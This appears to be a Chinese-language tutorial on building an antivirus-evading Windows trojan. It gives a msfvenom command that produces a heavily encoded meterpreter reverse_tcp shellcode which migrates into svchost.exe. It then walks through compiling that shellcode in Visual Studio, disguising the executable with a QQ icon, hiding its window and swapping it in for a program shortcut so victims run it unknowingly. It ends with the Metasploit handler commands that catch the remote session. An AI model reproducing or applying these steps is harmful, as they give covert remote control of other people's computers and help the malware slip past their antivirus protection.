0x01:我们依靠msf生成简单的shellcode免杀
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f c > /root/Desktop/shellcode.c
这里我们生成的windows,我们选择的是windows/meterpreter/reverse_tcp,LHOST是代理(远程)服务器的ip,LPORT是远程(代理)服务器的端口,-e x86/shikata_ga_nai -i 15是用 -e x86/shikata_ga_hai编码15次,而PrependMigrate=true PrependMIgrateProx=svchost.exe是使这个程序会默认迁移到svchost.exe进程,自己测试的时候和不建议到这个进程而是其他的持久的进程,这样子别人打开之后就无法再常规的去关闭回连的会话。当然你还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。
相信大家都试过,直接输出exe文件就算注入其他软件和进行编码n遍也会马上被查杀出来。多次测试发现用x86/shikata_ga_na编码超过12次以上再通过shellcode编译出来都能免杀。
如下图你的桌面会有一个shellcode.c文件
将其移到 windows,用记事本打开会有 :unsigned char buf[] =”一长串数字”
接着我们用vs2015去开始编译木马
在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。
编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,再用电脑的搜索查找*.icon,找到 QQ的图标找到你这个项目的文件夹下会有一个1icon.ico文件,将QQ的图标改成1icon.ico,拖进去替换掉原来的那个图标文件
然后vs平台就会出现下图:
这个时候你再编译出来就会是一个QQ图标的木马。具体情况下你可以以此方法任意改图标再重命名,使你的木马更加具有迷惑性。
我们再使用国内普遍的360杀毒软件测试一下效果,证明可以免杀了
只要在不影响shellcode的情况下,你可以对这个程序再增加扩展(就看你的c语言功底了),比如这里使用#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\”")隐藏程序窗口,并用这个程序取代快捷方式,再通过这个程序调用原来真正的程序基本就神不知鬼不觉了。
其次就是建议各位在测试自己的木马时一定要关闭云端上传功能,360会收集可以软件,上传云端检测,然后备份通杀,所以你的木马没准今天还可以免杀,明天就全国联保了。心疼被吃的一个马。
0x02:meterpreter的后渗透功能
首先要做的就是配置号监听端,也就是我们的攻击服务端
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ip
set LPORT port
exploit
LHOST和LPORT为攻击(代理)的ip和端口,接下来就是等待目标连接我们的木马。
如下所示就是成功了。